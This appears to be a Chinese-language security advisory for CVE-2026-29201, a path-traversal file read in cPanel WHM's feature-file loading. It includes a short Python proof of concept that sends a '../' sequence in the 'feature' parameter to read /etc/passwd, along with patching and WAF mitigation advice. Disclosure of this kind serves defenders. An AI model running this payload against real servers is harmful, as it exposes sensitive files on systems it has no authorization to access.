CVE-2026-29201 cPanel WHM 任意文件读取漏洞

漏洞信息

漏洞编号

CVE-2026-29201

漏洞类型

任意文件读取

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

cPanel WHM

漏洞概述

cPanel WHM的`feature::LOADFEATUREFILE` AdminBin调用中因对功能文件名输入验证不足，攻击者可通过传递相对文件路径造成任意文件读取。

技术细节

该漏洞产生于cPanel WHM处理AdminBin调用时的安全缺陷，核心问题出在`feature::LOADFEATUREFILE`函数对文件名参数的处理上。由于代码层面缺乏对输入数据的充分校验，未能识别并阻断包含目录遍历字符（如`../`）的恶意请求。攻击者若拥有低权限账户，可通过网络向目标接口发送包含相对路径的Payload。服务器在解析该路径时，会将其转换为文件系统的绝对路径，从而跳过预期的安全沙箱。利用此机制，攻击者可成功读取服务器上的任意敏感文件，如`/etc/passwd`或数据库配置文件，造成机密性泄露并可能为进一步的提权攻击提供基础。

攻击链分析

STEP 1

侦察

攻击者识别出目标主机运行着存在CVE-2026-29201漏洞的cPanel WHM版本。

STEP 2

利用

攻击者使用低权限账户登录，并向AdminBin接口发送特制请求，在feature参数中注入路径遍历序列（如../）。

STEP 3

数据泄露

服务器解析恶意路径，读取并返回预期目录之外的敏感文件内容（如/etc/passwd），导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "https://cpanel-target:2083/json-api/cpanel"
api_token = "LOW_PRIV_TOKEN"
user = "target_user"

payload = {
    "cpanel_jsonapi_version": "2",
    "cpanel_jsonapi_module": "FeatureManager",
    "cpanel_jsonapi_func": "loadfeaturefile",
    "cpanel_jsonapi_user": user,
    "feature": "../../../../../../etc/passwd"
}

headers = {"Authorization": f"whm {user}:{api_token}"}

response = requests.post(target_url, data=payload, headers=headers, verify=False)
print(response.text)

影响范围

cPanel WHM < May 08 2026 Security Release

防御指南

临时缓解措施

建议立即应用官方发布的安全补丁。在无法立即升级的情况下，应严格监控系统日志，并通过WAF等安全设备过滤包含“../”或类似路径遍历特征的请求流量，同时限制非必要用户对管理后台的访问。